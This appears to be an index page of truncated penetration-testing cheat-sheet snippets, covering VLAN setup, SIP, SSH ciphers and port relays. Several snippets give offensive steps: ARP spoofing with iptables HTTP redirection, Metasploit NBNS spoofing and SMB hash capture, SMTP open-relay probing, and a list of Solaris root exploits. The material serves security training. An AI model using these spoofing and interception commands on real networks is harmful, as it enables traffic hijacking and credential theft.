Latest notes for PenTesting- MrLeet

MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

Configure an Ethernet interface as a VLAN trunk

Suppose that a host requires access to two VLANs, both carried by a trunk connected to physical interface eth0. The assigned IP addresses for the host are on VLAN 2 and on VLAN 3.

[+] First install the vlan packag...

Score: 0

VOIP (SIP) Cheatsheet

SIP usually uses ports 5060 TCP or UDP for unencrypted signaling or 5061 for encrypted transportation using TLS.

SIP is an ASCII based protocol which has some similar elements like in the HTTP protocol by using a Request/Response model. Much like an HTTP request from a browser a SIP clie...

Score: 0

By: ajayverma 2019-06-25 11:35:26

Useful commands

[+] Remove text using sed

cat SSL_Hosts.txt | sed -r 's/\ttcp\t/:/g'

[+] Port forwarding using NCAT

ncat -lvkp 12345 -c "ncat --ssl 443"

[+] Windows 7 or later, build port relay

C:\> netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0...

Score: 0

Browser Addons

- Chrome:

Recx Security Analyser

- Firefox/Iceweasel:

Web Developer
Tamper Data
FoxyProxy Standard
User Agent Switcher

Score: 0

By: ajayverma 2019-06-25 11:35:32

[+] Solaris vulnerabilities:

Solaris 7:
sadmind_exec SADMIND - weakness in default security settings - allows root -
**ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client
sendmail_exec LPD - line printer daemon buffer overflow - allows root
heap_noir ...

Score: 0

By: ajayverma 2019-06-25 11:35:35

1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward

2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

3) -l 8080 -f lock.ico

4) Run arpspoof to redirect traffic to your machine (as...

Score: 0

By: ajayverma 2019-06-25 11:35:38

[+] SMTP Open Relay Commands

[-] ncat -C 25
[-] HELO
[-] MAIL FROM: <>
[-] RCPT TO: <>
[-] DATA
Test Email...

Score: 0

By: ajayverma 2019-06-25 11:35:41

[+] Weak SSH Ciphers

sudo nano /etc/ssh/sshd_config

Add the following lines:

Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160

Restart SSH

[+] Unquoted Service Paths

Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add &...

Score: 0

By: ajayverma 2019-06-25 11:23:20

[+] NBNS Spoof / Capture

[>] NBNS Spoof
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP
msf auxiliary(nbns_response) > run

[>] SMB Capture

msf > use auxiliary/server/...

Score: 0

By: ajayverma 2019-06-25 11:23:24


root@bt:~# nbtscan -r
Doing NBT name scan for addresses from

IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------ Sendto failed: Permission denied <unknown> ...

Score: 0